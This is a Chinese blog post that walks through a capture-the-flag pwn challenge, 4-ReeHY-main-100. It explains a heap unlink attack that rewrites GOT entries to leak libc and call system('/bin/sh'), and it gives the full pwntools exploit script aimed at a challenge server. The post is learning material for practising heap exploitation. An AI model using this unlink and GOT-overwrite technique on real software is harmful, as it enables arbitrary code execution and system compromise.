xctf 4-ReeHY-main-100

最新推荐文章于 2024-05-12 01:02:53 发布
最新推荐文章于 2024-05-12 01:02:53 发布
阅读量698 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41617275/article/details/101285649
版权
pwn 同时被 2 个专栏收录
18 篇文章 1 订阅
订阅专栏
3 篇文章 0 订阅
订阅专栏

卡了很久,最后发现他给的libc有点问题,还是用libcsearcher找,贼坑。
参考:https://bbs.pediy.com/thread-218300.htm

首先是unlink修改free的got表为puts的plt表地址,泄露函数地址,然后修改free为system,执行system(binsh)。

# -*- coding: utf-8 -*-  

from pwn import*
from LibcSearcher import *

context(arch = 'amd64', os = 'linux',log_level="debug") 

def Welcome():
    p.recvuntil("$ ")
    p.sendline("mutepig")
 
def Add(size,id,content):
    p.recvuntil("$ ")
    p.sendline("1")
    p.recvuntil("size\n")
    p.sendline(str(size))
    p.recvuntil("cun\n")
    p.sendline(str(id))
    p.recvuntil("content\n")
    p.sendline(content)
 
def Remove(id):
    p.recvuntil("$ ")
    p.sendline("2")
    p.recvuntil("dele\n")
    p.sendline(str(id))
 
def Edit(id,content):
    p.recvuntil("$ ")
    p.sendline("3")
    p.recvuntil("edit\n")
    p.sendline(str(id))
    p.recvuntil("content\n")
    p.send(content)

if 0:  # local
    p = process("./4-ReeHY-main")

else:
    p = remote('111.198.29.45',43936)


elf = ELF('4-ReeHY-main')

free_got = elf.got['free']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
heap_addr = 0x602100

print hex(free_got)
Welcome()
Add(512,0,"/bin/sh\x00")
Add(512,1,"11111111")
Add(512,2,"22222222")
Add(512,3,"33333333")

Remove(3)													#这里如果用1,2会有问题,不知道啥原因
Remove(2)
print hex(heap_addr)


payload = p64(0) + p64(512+1) + p64(heap_addr - 0x18) + p64(heap_addr - 0x10) + 'A'*(512-0x20) + p64(512) + p64(512)
Add(1024,2,payload)
Remove(3) 													#double free后,此时2的指针指向存放该指针的前3字节,在栈上

Edit(2,'1'*0x18 + p64(free_got)+p64(1)+p64(atoi_got))		#这里修改的是存放指向2和3的指针的位置,edit后,原本指向2的指针已指向got表中的free,原本指向3的指针指向got表中atoi函数的位置,用于泄露atoi函数的地址。

Edit(2,p64(puts_plt))										#修改free为puts
Remove(3)													#相当于puts(got[atoi])

atoi_addr=p.recv(6)
atoi_addr=atoi_addr.ljust(8,'\x00')
atoi_addr = u64(atoi_addr)
obj=LibcSearcher("atoi",atoi_addr)
base_addr = atoi_addr - obj.dump('atoi')
print "======="+hex(base_addr)

#raw_input()
#gdb.attach(p)
system_addr = base_addr + obj.dump('system')
 
Edit(2,p64(system_addr))
Remove(0)
p.interactive()
发蝴蝶和大脑斧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
攻防世界 4-ReeHY-main-100
BengDouLove的博客
04-01 768
本来想着做2018年的网鼎杯 pwn的,但是就算看了 wp也无法模仿着实现,所以就退而求其次先做一些堆的题吧 18年网鼎杯的pwn有个babyheap,里面用到的unlink我一直不懂,断链是知道咋实现的,但是到底有啥用真是不做题无法体会 然后在攻防世界找了一个pwn题,就是这道题,看了一个肥肠肥肠细致的博主的文章,收获颇多 传送门 下面我就记录一下,题的思路大致和这个博主一样,后面我自己发挥了一...
XCTF攻防世界 4-ReeHY-main-100 题解
CoLin的pwn小屋
04-05 3670
XCTF 4-ReeHY-main-100 适用于最新版本libc的两种解题姿势
【CTF MISC】XCTF GFSJ0510 this_is_flag Writeup(信息收集)
最新发布
HEX9CF的技术博客
05-12 360
包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,大多数标志的形式都是flag{xxx},例如:flag{th1s_!s_a_d4m0_4la9}所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且。本博客上发布的所有关于网络攻防技术的文章,对于因使用这些技术而导致的任何后果,
攻防世界学习笔记2022.5.15
u014377094的博客
05-15 618
dubblesort 32位栈题,保护开的很全,有canary保护 canary处有偏移,并不是直接ebp+4 学习点: 1.使用+-号跳过scanf,防止对canary位修改 示例,如输入+,并不会对内容修改。 2. puts函数往往会存在利用,因为以0为结尾读取,所以往往拿来泄露地址。 该题采用泄露buf中的地址来获得libc基址。不过buf中为何会有关于这些的残留,暂且不知,可能是之前同等级函数调用时残留在栈中的数据? 3.关于脚本交互。 注意什么时候u32,什么时候str(),
4-ReeHY-main-100 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列22
重新启程
12-26 648
题目地址:4-ReeHY-main-100 本题是高手进阶区的第11题,已经逐步稳定在5颗星的难度级别了。 废话不说,看看题目先 照例检查一下保护机制: [*] '/ctf/work/python/4-ReeHY-main-100/4-ReeHY-main' Arch: amd64-64-little RELRO: Partial RELRO Sta...
4-ReeHY-main-100 一道题学到了很多的知识
qq_41071646的博客
05-14 1272
先说一下参考链接 https://bbs.pediy.com/thread-218300.htm 然后这个题 其实可以按堆的解法来做 也可以按照 栈的解法来做 这个要看自己的做法了 然后我首先看的是堆的解法 一开始我的想法是 直接 double free直接 到 heap_user 但是失败了 然后看了这篇帖子感觉受益匪浅 然后写篇这个帖子来记录一下 ‘ 然后 那篇帖子其实讲的很明白 我...
4-ReeHY-main-100(xctf)
weixin_43868725的博客
08-14 295
0x0 程序保护和流程 保护: 流程: main() 程序的问题主要存在于两个函数,第一个问题位于是create() 输入的size是有符号的,而在调用read函数是传入的参数是无符号的。所以存在整数溢出从而导致了栈溢出。 第二个问题位于delete() 只对索引做了限制,没有对堆块的指针清零,所以存在UAF。 0x1 利用过程 栈溢出的利用过程: 对于padding的长度是0x98应该没什么问题,但是在对栈进行覆盖时必须注意栈中变量是否在覆盖后仍然被程序使用并且是否合法。如程序中的 memcpy(
XCTF-HW-pipeline附件
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-mobile app2
01-03
分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个文件中包含了大部分程序...
看雪4-ReeHY-main-2017
Peanuts
01-26 725
看雪4-ReeHY-main-2017 题目本身很有意思应该会有很多种解法这里先记录第一种解法,栈的方法 题目链接:https://ctf.pediy.com/game-fight-34.htm 主程序分析 这里主要实现了几个功能吧,下面一一分析九个功能 这里首先让我们输入signint然后malloc一个这个大小的堆块,然后input cun让我们输入储存的大小其中不能超过4但是没有对输入进...
unlink 攻防世界4-ReeHY-main
csdn546229768的博客
12-10 581
例题:攻防世界 4-ReeHY-main 当一个chunk释放为unsort bin时会检查上下是否为free chunk,如果上为free chunk则发生合并、合并后会调用unlink函数:(2.23) /* consolidate backward */ if (!prev_inuse(p)) { //当前的p标志位为0(上个chunk free) prevsize = p->prev_size; size += prevsize; //本chunk的size
XCTF 攻防世界】杂项 misc 高手进阶区 4-1
weixin_45844670的博客
08-18 1178
下载附件得到一张照片, 用foremost分离得到了一个压缩包 打开压缩包是 两张照片肉眼看上去完全一样,我先用了stegsolve没有找到flag 猜测是盲水印 使用工具BlindWaterMark盲水印工具(到GitHub去搜) 先下载需要的库 pip install -r requirements.txt 提取图中的盲水印 (需要原图) #python2 python bwm.py decode 无水印图 有水印图 结果图 #python3 python bwmforpy3.py decod
攻防世界 MISC 新手练习区 答题(1-12题解)
小哈里的博客
10-09 6905
序 传送门:https://adworld.xctf.org.cn/task/ 1、this is flag 题目描述:Most flags are in the form flag{xxx}, for example:flag{th1s_!s_a_d4m0_4la9} 题解:题目即答案 flag{th1s_!s_a_d4m0_4la9} 2、pdf 题目描述:菜猫给了菜狗一张图,说图下面什么都没有 题解: 附件pdf,里面有一张图 鼠标移动,发现眼睛位置附近出现 文字输入光标,全部选中复制出来就
4-ReeHY-main-100_最详细题解PWN
seaaseesa的博客
11-04 2139
Libc2.26以下的解法 使用的是double free的unlink漏洞 unlink是利用glibc malloc 的内存回收机制造成攻击的,核心就在于当两个free的堆块在物理上相邻时,会将他们合并,并将原来free的堆块在原来的链表中解链,加入新的链表中,但这样的合并是有条件的,向前或向后合并。 Unsorted bin使用双向链表维护被释放的空间,如果有一个堆块...
攻防世界 4-ReeHY-main
weixin_30552811的博客
09-07 209
检查保护机制:    发现 可以好像写got 然后 程序流程 这里 有double free 然后 再发现 这里很有趣 ,要是我的content为零了 且size 小于112 那就从栈上copy一些内容进去 利用double free ,再修改残留在chunk上的fd的信息 就能达到任意地址...
XCTF攻防世界(2019Xman第一阶段练习赛) Pwn 4-ReeHY-main 两种解法
Kaller的博客
08-05 647
一、栈溢出Getshell 分析 审计IDA代码,发现在create中存在栈溢出、类型转换漏洞。如下: ///栈空间布局 int result; // eax char buf; // [rsp+0h] [rbp-90h] void *dest; // [rsp+80h] [rbp-10h] int index; // [rsp+88h] [rbp-8h] s...
【PWN系列】XCTF-4-ReeHY-main-100 Writeup
Vicl1fe的博客
11-18 355
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/xingzherufeng/p/9885860.html#commentform https://blog.csdn.net/seaaseesa/article/details/102907138 分析 其实此题有两种解法,一个是整型溢出,一个是double free。因为暂时只搞懂了double free,先写double free的解法 运行程序大概可以看到
web-ics-05
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值